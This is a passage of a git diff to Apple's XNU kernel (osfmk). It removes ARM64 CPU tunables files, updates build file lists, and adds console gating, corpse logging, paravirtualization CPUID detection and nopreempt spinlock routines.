b/osfmk/arm64/tunables/tunables_h7.s deleted file mode 100644 index d239bb993..000000000 --- a/osfmk/arm64/tunables/tunables_h7.s +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - - // Disable LSP flush with context switch to work around bug in LSP - // that can cause Typhoon to wedge when CONTEXTIDR is written. - // - HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_LoopBuffDisb, $1 - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccDisStallInactiveIexCtl, $1 - HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisXmonSnpEvictTriggerL2StarvationMode, $1 - HID_CLEAR_BITS ARM64_REG_HID5, (ARM64_REG_HID5_DisHwpLd | ARM64_REG_HID5_DisHwpSt), $1 - - // Change the default memcache data set ID from 0 to 15 for all agents - HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_CAPRI, $0, $1 - HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_DataSetID2_VALUE, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - /* N/A */ - - isb sy -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h8.s b/osfmk/arm64/tunables/tunables_h8.s deleted file mode 100644 index 0f2a5d7a2..000000000 --- a/osfmk/arm64/tunables/tunables_h8.s +++ /dev/null @@ -1,60 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - HID_CLEAR_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisFillC1BubOpt, $1 - - // Change the default memcache data set ID from 0 to 15 for all agents - HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1 - HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID2_VALUE | ARM64_REG_HID8_DataSetID3_VALUE), $1 - - // Use 4-cycle MUL latency to avoid denormal stalls - HID_SET_BITS ARM64_REG_HID7, ARM64_REG_HID7_disNexFastFmul, $1 - - // disable reporting of TLB-multi-hit-error - // - HID_CLEAR_BITS ARM64_REG_LSU_ERR_STS, ARM64_REG_LSU_ERR_STS_L1DTlbMultiHitEN, $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores and revisions *****/ - - // rdar://problem/36112905: Set CYC_CFG:skipInit to pull in isAlive by one DCLK - // to work around potential hang. Must only be applied to Maui C0. - EXEC_COREEQ_REVEQ MIDR_MAUI, CPU_VERSION_C0, $0, $1 - HID_SET_BITS ARM64_REG_CYC_CFG, ARM64_REG_CYC_CFG_skipInit, $1 - EXEC_END - isb sy -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h9.s b/osfmk/arm64/tunables/tunables_h9.s deleted file mode 100644 index c44e91c77..000000000 --- a/osfmk/arm64/tunables/tunables_h9.s +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - - // IC prefetch configuration - // - HID_INSERT_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefDepth_bmsk, ARM64_REG_HID0_ICPrefDepth_VALUE, $1 - HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefLimitOneBrn, $1 - - // disable reporting of TLB-multi-hit-error - // - HID_CLEAR_BITS ARM64_REG_LSU_ERR_CTL, ARM64_REG_LSU_ERR_CTL_L1DTlbMultiHitEN, $1 - - // disable crypto fusion across decode groups - // - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_disAESFuseAcrossGrp, $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_MYST, $0, $1 - // Clear DisDcZvaCmdOnly - // Per Myst A0/B0 tunables document - // Myst: Confirm ACC Per-CPU Tunables - HID_CLEAR_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1 - HID_CLEAR_BITS ARM64_REG_EHID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - /* N/A */ -.endmacro \ No newline at end of file diff --git a/osfmk/conf/Makefile.template b/osfmk/conf/Makefile.template index bdf7fe02e..a09b5d2c3 100644 --- a/osfmk/conf/Makefile.template +++ b/osfmk/conf/Makefile.template @@ -132,7 +132,6 @@ uat.o_CFLAGS_ADD += -Wno-implicit-int-conversion video_console.o_CFLAGS_ADD += -Wno-implicit-int-conversion xcpm_dvfs.o_CFLAGS_ADD += -Wno-implicit-int-conversion xcpm_ioctl.o_CFLAGS_ADD += -Wno-implicit-int-conversion -zalloc.o_CFLAGS_ADD += -Wno-implicit-int-conversion # -Wno-shorten-64-to-32 arm_vm_init.o_CFLAGS_ADD += -Wno-shorten-64-to-32 backtrace.o_CFLAGS_ADD += -Wno-shorten-64-to-32 @@ -166,7 +165,6 @@ vm_object.o_CFLAGS_ADD += -Wno-shorten-64-to-32 vm_shared_region_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32 vm_swapfile_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32 vm_user.o_CFLAGS_ADD += -Wno-shorten-64-to-32 -zalloc.o_CFLAGS_ADD += -Wno-shorten-64-to-32 # -Wno-sign-conversion Diagnostics.o_CFLAGS_ADD += -Wno-sign-conversion acpi.o_CFLAGS_ADD += -Wno-sign-conversion @@ -368,8 +366,6 @@ xcpm_dvfs.o_CFLAGS_ADD += -Wno-sign-conversion xcpm_fi.o_CFLAGS_ADD += -Wno-sign-conversion xcpm_idle.o_CFLAGS_ADD += -Wno-sign-conversion xcpm_ioctl.o_CFLAGS_ADD += -Wno-sign-conversion -zalloc.o_CFLAGS_ADD += -Wno-sign-conversion -zcache.o_CFLAGS_ADD += -Wno-sign-conversion # Rebuild if per-file overrides change ${OBJS}: $(firstword $(MAKEFILE_LIST)) diff --git a/osfmk/conf/files b/osfmk/conf/files index 991216abd..a7e18d895 100644 --- a/osfmk/conf/files +++ b/osfmk/conf/files @@ -49,7 +49,6 @@ OPTIONS/mach_vm_debug optional mach_vm_debug OPTIONS/mach_page_hash_stats optional mach_page_hash_stats OPTIONS/mig_debug optional mig_debug OPTIONS/vm_cpm optional vm_cpm -OPTIONS/task_swapper optional task_swapper OPTIONS/stack_usage optional stack_usage OPTIONS/importance_inheritance optional importance_inheritance OPTIONS/importance_debug optional importance_debug @@ -79,8 +78,8 @@ OPTIONS/config_quiesce_counter optional config_quiesce_counter # # UserNotification files # -./UserNotification/UNDRequest.c standard -./UserNotification/UNDReplyServer.c standard +./UserNotification/UNDRequest.c optional config_user_notification +./UserNotification/UNDReplyServer.c optional config_user_notification osfmk/UserNotification/KUNCUserNotifications.c standard osfmk/kdp/kdp.c optional config_kdp_interactive_debugging @@ -120,7 +119,7 @@ osfmk/kern/build_config.c standard osfmk/kern/clock.c standard osfmk/kern/clock_oldops.c standard osfmk/kern/coalition.c optional config_coalitions -osfmk/kern/counters.c standard +osfmk/kern/counter_common.c standard osfmk/kern/cpu_quiesce.c optional config_quiesce_counter osfmk/kern/debug.c standard osfmk/kern/ecc_logging.c optional config_ecc_logging @@ -175,7 +174,6 @@ osfmk/kern/syscall_sw.c standard osfmk/kern/sysdiagnose.c optional config_sysdiagnose osfmk/kern/task.c standard osfmk/kern/task_policy.c standard -osfmk/kern/task_swap.c standard osfmk/kern/test_lock.c optional development osfmk/kern/test_lock.c optional debug osfmk/kern/test_mpsc_queue.c optional development @@ -192,7 +190,6 @@ osfmk/kern/ux_handler.c standard osfmk/kern/waitq.c standard osfmk/kern/work_interval.c standard osfmk/kern/zalloc.c standard -osfmk/kern/zcache.c optional config_zcache osfmk/kern/gzalloc.c optional config_gzalloc osfmk/kern/bsd_kern.c optional mach_bsd osfmk/kern/hibernate.c optional hibernation @@ -200,6 +197,7 @@ osfmk/kern/remote_time.c standard osfmk/kern/memset_s.c standard osfmk/kern/copyout_shim.c optional copyout_shim osfmk/kern/suid_cred.c standard +osfmk/kern/task_ident.c standard ./mach/clock_server.c standard ./mach/clock_priv_server.c standard @@ -250,6 +248,7 @@ osfmk/voucher/ipc_pthread_priority.c standard ./mach/fairplayd_notification_user.c optional config_arcade ./mach/arcade_upcall_user.c optional config_arcade ./mach/arcade_register_server.c optional config_arcade +./mach/iocompressionstats_notification_user.c optional config_io_compression_stats # # For now, no external pagers diff --git a/osfmk/conf/files.arm b/osfmk/conf/files.arm index 74181f5e9..1d0f04be6 100644 --- a/osfmk/conf/files.arm +++ b/osfmk/conf/files.arm @@ -53,6 +53,7 @@ osfmk/arm/trustcache.c standard osfmk/arm/model_dep.c standard osfmk/arm/pcb.c standard osfmk/arm/rtclock.c standard +osfmk/arm/counter.c standard osfmk/arm/status.c standard osfmk/arm/status_shared.c standard osfmk/arm/trap.c standard diff --git a/osfmk/conf/files.arm64 b/osfmk/conf/files.arm64 index b8f235bdb..266a05ca1 100644 --- a/osfmk/conf/files.arm64 +++ b/osfmk/conf/files.arm64 @@ -96,3 +96,5 @@ osfmk/arm64/pgtrace.c standard osfmk/arm64/pgtrace_decoder.c optional config_pgtrace_nonkext osfmk/arm64/machine_remote_time.c optional config_mach_bridge_recv_time osfmk/arm64/corecrypto/sha256_compress_arm64.s standard + +osfmk/arm/counter.c standard diff --git a/osfmk/conf/files.x86_64 b/osfmk/conf/files.x86_64 index 5393a8cd6..37136bd63 100644 --- a/osfmk/conf/files.x86_64 +++ b/osfmk/conf/files.x86_64 @@ -94,8 +94,10 @@ osfmk/i386/ucode.c standard osfmk/i386/vmx/vmx_cpu.c optional config_vmx osfmk/i386/vmx/vmx_shims.c optional config_vmx +osfmk/i386/x86_hypercall.c optional development osfmk/kern/hv_support_kext.c optional hypervisor +osfmk/kern/hv_io_notifier.c optional hypervisor # DUMMIES TO FORCE GENERATION OF .h FILES #osfmk/OPTIONS/ln optional ln @@ -114,3 +116,4 @@ osfmk/x86_64/idt64.s standard osfmk/i386/panic_hooks.c standard osfmk/i386/panic_notify.c standard osfmk/x86_64/machine_remote_time.c optional config_mach_bridge_send_time +osfmk/x86_64/counter.c standard diff --git a/osfmk/console/serial_console.c b/osfmk/console/serial_console.c index 586562011..980a7810d 100644 --- a/osfmk/console/serial_console.c +++ b/osfmk/console/serial_console.c @@ -317,7 +317,15 @@ get_cons_ops_index(void) static inline void _cnputs(char * c, int size) { - uint32_t idx = get_cons_ops_index(); + extern int disableConsoleOutput; + + if (disableConsoleOutput) { + return; + } + + assert(c != NULL); + + const uint32_t idx = get_cons_ops_index(); while (size-- > 0) { if (*c == '\n') { diff --git a/osfmk/console/serial_general.c b/osfmk/console/serial_general.c index 62bde9741..34ba2b4e4 100644 --- a/osfmk/console/serial_general.c +++ b/osfmk/console/serial_general.c @@ -113,8 +113,13 @@ switch_to_video_console(void) int switch_to_serial_console(void) { + extern bool serial_console_enabled; int old_cons_ops = cons_ops_index; - cons_ops_index = SERIAL_CONS_OPS; + + if (serial_console_enabled) { + cons_ops_index = SERIAL_CONS_OPS; + } + return old_cons_ops; } diff --git a/osfmk/corpses/corpse.c b/osfmk/corpses/corpse.c index d440c79bd..fcb67e202 100644 --- a/osfmk/corpses/corpse.c +++ b/osfmk/corpses/corpse.c @@ -130,6 +130,7 @@ #include #include #include +#include #if CONFIG_MACF #include @@ -218,6 +219,9 @@ total_corpses_count(void) return gate.corpses; } +extern char *proc_best_name(struct proc *); +extern int proc_pid(struct proc *); + /* * Routine: task_crashinfo_get_ref() * Grab a slot at creating a corpse. @@ -227,6 +231,7 @@ static kern_return_t task_crashinfo_get_ref(corpse_flags_t kcd_u_flags) { union corpse_creation_gate oldgate, newgate; + struct proc *p = (void *)current_proc(); assert(kcd_u_flags & CORPSE_CRASHINFO_HAS_REF); @@ -235,10 +240,14 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags) newgate = oldgate; if (kcd_u_flags & CORPSE_CRASHINFO_USER_FAULT) { if (newgate.user_faults++ >= TOTAL_USER_FAULTS_ALLOWED) { + os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many faults %d\n", + proc_best_name(p), proc_pid(p), newgate.user_faults); return KERN_RESOURCE_SHORTAGE; } } if (newgate.corpses++ >= TOTAL_CORPSES_ALLOWED) { + os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many %d\n", + proc_best_name(p), proc_pid(p), newgate.corpses); return KERN_RESOURCE_SHORTAGE; } @@ -246,6 +255,8 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags) if (atomic_compare_exchange_strong_explicit(&inflight_corpses, &oldgate.value, newgate.value, memory_order_relaxed, memory_order_relaxed)) { + os_log(OS_LOG_DEFAULT, "%s[%d] Corpse allowed %d of %d\n", + proc_best_name(p), proc_pid(p), newgate.corpses, TOTAL_CORPSES_ALLOWED); return KERN_SUCCESS; } } @@ -277,6 +288,7 @@ task_crashinfo_release_ref(corpse_flags_t kcd_u_flags) if (atomic_compare_exchange_strong_explicit(&inflight_corpses, &oldgate.value, newgate.value, memory_order_relaxed, memory_order_relaxed)) { + os_log(OS_LOG_DEFAULT, "Corpse released, count at %d\n", newgate.corpses); return KERN_SUCCESS; } } @@ -653,7 +665,7 @@ error_task_generate_corpse: /* Terminate all the other threads in the task. */ queue_iterate(&new_task->threads, thread_next, thread_t, task_threads) { - thread_terminate_internal(thread_next); + thread_terminate_internal(thread_next, TH_TERMINATE_OPTION_NONE); } /* wait for all the threads in the task to terminate */ task_wait_till_threads_terminate_locked(new_task); diff --git a/osfmk/device/iokit_rpc.c b/osfmk/device/iokit_rpc.c index f71023158..6c1c7fac3 100644 --- a/osfmk/device/iokit_rpc.c +++ b/osfmk/device/iokit_rpc.c @@ -41,7 +41,6 @@ #include #include -#include #include #include #include @@ -181,6 +180,12 @@ iokit_release_port( ipc_port_t port ) ipc_port_release( port ); } +EXTERN void +iokit_make_port_send( ipc_port_t port ) +{ + ipc_port_make_send( port ); +} + EXTERN void iokit_release_port_send( ipc_port_t port ) { @@ -310,9 +315,8 @@ iokit_make_send_right( task_t task, io_object_t obj, ipc_kobject_type_t type ) // thread-argument-passing and its value should not be garbage current_thread()->ith_knote = ITH_KNOTE_NULL; kr = ipc_object_copyout( task->itk_space, ip_to_object(sendPort), - MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name); + MACH_MSG_TYPE_PORT_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &name); if (kr != KERN_SUCCESS) { - ipc_port_release_send( sendPort ); name = MACH_PORT_NULL; } } else if (sendPort == IP_NULL) { diff --git a/osfmk/i386/Makefile b/osfmk/i386/Makefile index 06391748e..2d6d61ec1 100644 --- a/osfmk/i386/Makefile +++ b/osfmk/i386/Makefile @@ -18,6 +18,7 @@ EXPORT_ONLY_FILES = \ cpuid.h \ eflags.h \ fpu.h \ + x86_hypercall.h \ io_map_entries.h \ lapic.h \ lock.h \ diff --git a/osfmk/i386/acpi.c b/osfmk/i386/acpi.c index d4e14d511..2af7ed288 100644 --- a/osfmk/i386/acpi.c +++ b/osfmk/i386/acpi.c @@ -347,6 +347,12 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon) init_fpu(); clear_ts(); + +#if HYPERVISOR + /* Notify hypervisor that we are about to resume */ + hv_resume(); +#endif + IOCPURunPlatformActiveActions(); KDBG(IOKDBG_CODE(DBG_HIBERNATE, 0) | DBG_FUNC_END, start, elapsed, @@ -361,7 +367,6 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon) /* Restart timer interrupts */ rtc_timer_start(); - #if MONOTONIC mt_cpu_up(cdp); #endif /* MONOTONIC */ diff --git a/osfmk/i386/bsd_i386.c b/osfmk/i386/bsd_i386.c index 7c01567ea..b25d0f5d6 100644 --- a/osfmk/i386/bsd_i386.c +++ b/osfmk/i386/bsd_i386.c @@ -34,7 +34,6 @@ #include #include -#include #include #include #include @@ -483,7 +482,7 @@ mach_call_arg_munger32(uint32_t sp, struct mach_call_args *args, const mach_trap __private_extern__ void mach_call_munger(x86_saved_state_t *state); -extern const char *mach_syscall_name_table[]; +extern const char *const mach_syscall_name_table[]; __attribute__((noreturn)) void diff --git a/osfmk/i386/bsd_i386_native.c b/osfmk/i386/bsd_i386_native.c index 541ec6a72..e117ddda9 100644 --- a/osfmk/i386/bsd_i386_native.c +++ b/osfmk/i386/bsd_i386_native.c @@ -33,7 +33,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/cpu_capabilities.h b/osfmk/i386/cpu_capabilities.h index c0b62d37b..a6ef153a7 100644 --- a/osfmk/i386/cpu_capabilities.h +++ b/osfmk/i386/cpu_capabilities.h @@ -155,6 +155,10 @@ _NumCPUs( void ) #else /* !KERNEL_PRIVATE */ +/* + * defines a couple of conveniency macros + * to help read data from the commpage. + */ #if defined(__i386__) #define _COMM_PAGE_AREA_LENGTH _COMM_PAGE32_AREA_LENGTH diff --git a/osfmk/i386/cpuid.c b/osfmk/i386/cpuid.c index 06ad4090d..90844be06 100644 --- a/osfmk/i386/cpuid.c +++ b/osfmk/i386/cpuid.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2019 Apple Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -219,6 +219,12 @@ boolean_t cpuid_tsx_supported = false; static void do_cwas(i386_cpu_info_t *cpuinfo, boolean_t on_slave); static void cpuid_do_precpuid_was(void); +#if DEBUG || DEVELOPMENT +static void cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature, + bool (*)(i386_vmm_info_t*, const uint32_t, const uint32_t)); +static bool cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf); +#endif /* DEBUG || DEVELOPMENT */ + static inline cpuid_cache_descriptor_t * cpuid_leaf2_find(uint8_t value) { @@ -1437,6 +1443,10 @@ cpuid_init_vmm_info(i386_vmm_info_t *info_p) info_p->cpuid_vmm_bus_frequency = reg[ebx]; } +#if DEBUG || DEVELOPMENT + cpuid_vmm_detect_pv_interface(info_p, APPLEPV_SIGNATURE, &cpuid_vmm_detect_applepv_features); +#endif + DBG(" vmm_vendor : %s\n", info_p->cpuid_vmm_vendor); DBG(" vmm_family : %u\n", info_p->cpuid_vmm_family); DBG(" vmm_bus_frequency : %u\n", info_p->cpuid_vmm_bus_frequency); @@ -1465,6 +1475,14 @@ cpuid_vmm_family(void) return cpuid_vmm_info()->cpuid_vmm_family; } +#if DEBUG || DEVELOPMENT +uint64_t +cpuid_vmm_get_applepv_features(void) +{ + return cpuid_vmm_info()->cpuid_vmm_applepv_features; +} +#endif /* DEBUG || DEVELOPMENT */ + cwa_classifier_e cpuid_wa_required(cpu_wa_e wa) { @@ -1596,3 +1614,68 @@ cpuid_do_precpuid_was(void) cpuid_tsx_disabled = true; } } + + +#if DEBUG || DEVELOPMENT + +/* + * Hunt for Apple Paravirtualization support in the hypervisor class leaves [0x4000_0000-0x4001_0000]. + * Hypervisor interfaces are expected to be found at 0x100 boundaries for compatibility. + */ + +static bool +cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf) +{ + if ((max_leaf - base) < APPLEPV_LEAF_INDEX_MAX) { + return false; + } + + /* + * Issue cpuid to make sure the interface supports "AH#1" features. + * This avoids a possible collision with "Hv#1" used by Hyper-V. + */ + uint32_t reg[4]; + char interface[5]; + cpuid_fn(base + APPLEPV_INTERFACE_LEAF_INDEX, reg); + memcpy(&interface[0], ®[eax], 4); + interface[4] = '\0'; + if (0 == strcmp(interface, APPLEPV_INTERFACE)) { + cpuid_fn(base + APPLEPV_FEATURES_LEAF_INDEX, reg); + info_p->cpuid_vmm_applepv_features = quad(reg[ecx], reg[edx]); + return true; + } + return false; +} + +static void +cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature, + bool (*searcher)(i386_vmm_info_t*, const uint32_t, const uint32_t)) +{ + int hcalls; + if (PE_parse_boot_argn("hcalls", &hcalls, sizeof(hcalls)) && + hcalls == 0) { + return; + } + + assert(info_p); + /* + * Look for PV interface matching signature + */ + for (uint32_t base = 0x40000100; base < 0x40010000; base += 0x100) { + uint32_t reg[4]; + char vendor[13]; + + cpuid_fn(base, reg); + memcpy(&vendor[0], ®[ebx], 4); + memcpy(&vendor[4], ®[ecx], 4); + memcpy(&vendor[8], ®[edx], 4); + vendor[12] = '\0'; + if ((0 == strcmp(vendor, signature)) && + (reg[eax] - base) < 0x100 && + (*searcher)(info_p, base, reg[eax])) { + break; + } + } +} + +#endif /* DEBUG || DEVELOPMENT */ diff --git a/osfmk/i386/cpuid.h b/osfmk/i386/cpuid.h index 577bf6167..3f608f707 100644 --- a/osfmk/i386/cpuid.h +++ b/osfmk/i386/cpuid.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2019 Apple Computer, Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -289,6 +289,30 @@ #define CPUID_VMM_FAMILY_KVM 0x6 +#if DEBUG || DEVELOPMENT + +/* + * Apple Paravirtualization CPUID leaves + * The base leaf can be placed at any unused 0x100 aligned boundary + * in the hypervisor class leaves [0x4000_0000-0x4001_0000]. + */ + +#define APPLEPV_INTERFACE_LEAF_INDEX 1 +#define APPLEPV_FEATURES_LEAF_INDEX 2 +#define APPLEPV_LEAF_INDEX_MAX APPLEPV_FEATURES_LEAF_INDEX + +#define APPLEPV_SIGNATURE "apple-pv-xnu" +#define APPLEPV_INTERFACE "AH#1" + +/* + * Apple Hypercall Feature Vector: + * Values in ECX:EDX returned by the base leaf + */ + +#define CPUID_LEAF_FEATURE_COREDUMP _Bit(0) + +#endif /* DEBUG || DEVELOPMENT */ + #ifndef ASSEMBLER #include @@ -485,6 +509,7 @@ typedef struct { uint32_t cpuid_vmm_family; uint32_t cpuid_vmm_bus_frequency; uint32_t cpuid_vmm_tsc_frequency; + uint64_t cpuid_vmm_applepv_features; } i386_vmm_info_t; typedef enum { @@ -553,10 +578,14 @@ extern uint32_t cpuid_cpufamily(void); extern i386_cpu_info_t *cpuid_info(void); extern void cpuid_set_info(void); extern boolean_t cpuid_vmm_present(void); +extern uint32_t cpuid_vmm_family(void); + +#if DEBUG || DEVELOPMENT +extern uint64_t cpuid_vmm_get_applepv_features(void); +#endif /* DEBUG || DEVELOPMENT */ #ifdef MACH_KERNEL_PRIVATE extern i386_vmm_info_t *cpuid_vmm_info(void); -extern uint32_t cpuid_vmm_family(void); extern cwa_classifier_e cpuid_wa_required(cpu_wa_e wa); extern void cpuid_do_was(void); extern const char *cpuid_vmm_family_string(void); diff --git a/osfmk/i386/i386_init.c b/osfmk/i386/i386_init.c index 12cdef33a..ad1f15c1f 100644 --- a/osfmk/i386/i386_init.c +++ b/osfmk/i386/i386_init.c @@ -129,6 +129,8 @@ int debug_task; int early_boot = 1; +bool serial_console_enabled = false; + static boot_args *kernelBootArgs; extern int disableConsoleOutput; @@ -932,6 +934,7 @@ i386_init(void) } } if (serialmode & SERIALMODE_OUTPUT) { + serial_console_enabled = true; (void)switch_to_serial_console(); disableConsoleOutput = FALSE; /* Allow printfs to happen */ } diff --git a/osfmk/i386/locks_i386.c b/osfmk/i386/locks_i386.c index 98d11ec50..8d6903b5a 100644 --- a/osfmk/i386/locks_i386.c +++ b/osfmk/i386/locks_i386.c @@ -126,6 +126,15 @@ decl_simple_lock_data(extern, panic_lock); extern unsigned int not_in_kdp; +#if !LOCK_STATS +#define usimple_lock_nopreempt(lck, grp) \ + usimple_lock_nopreempt(lck) +#define usimple_lock_try_nopreempt(lck, grp) \ + usimple_lock_try_nopreempt(lck) +#endif +static void usimple_lock_nopreempt(usimple_lock_t, lck_grp_t *); +static unsigned int usimple_lock_try_nopreempt(usimple_lock_t, lck_grp_t *); + /* * We often want to know the addresses of the callers * of the various lock routines. However, this information @@ -341,6 +350,22 @@ lck_spin_lock( usimple_lock((usimple_lock_t) lck, NULL); } +void +lck_spin_lock_nopreempt( + lck_spin_t *lck) +{ + usimple_lock_nopreempt((usimple_lock_t) lck, NULL); +} + +void +lck_spin_lock_nopreempt_grp( + lck_spin_t *lck, + lck_grp_t *grp) +{ +#pragma unused(grp) + usimple_lock_nopreempt((usimple_lock_t) lck, grp); +} + /* * Routine: lck_spin_unlock */ @@ -351,6 +376,13 @@ lck_spin_unlock( usimple_unlock((usimple_lock_t) lck); } +void +lck_spin_unlock_nopreempt( + lck_spin_t *lck) +{ + usimple_unlock_nopreempt((usimple_lock_t) lck); +} + boolean_t lck_spin_try_lock_grp( lck_spin_t *lck, @@ -383,6 +415,34 @@ lck_spin_try_lock( return lrval; } +int +lck_spin_try_lock_nopreempt( + lck_spin_t *lck) +{ + boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, LCK_GRP_NULL); +#if DEVELOPMENT || DEBUG + if (lrval) { + pltrace(FALSE); + } +#endif + return lrval; +} + +int +lck_spin_try_lock_nopreempt_grp( + lck_spin_t *lck, + lck_grp_t *grp) +{ +#pragma unused(grp) + boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, grp); +#if DEVELOPMENT || DEBUG + if (lrval) { + pltrace(FALSE); + } +#endif + return lrval; +} + /* * Routine: lck_spin_assert */ @@ -439,12 +499,8 @@ usimple_lock_init( usimple_lock_t l, __unused unsigned short tag) { -#ifndef MACHINE_SIMPLE_LOCK USLDBG(usld_lock_init(l, tag)); hw_lock_init(&l->interlock); -#else - simple_lock_init((simple_lock_t)l, tag); -#endif } volatile uint32_t spinlock_owner_cpu = ~0; @@ -469,6 +525,22 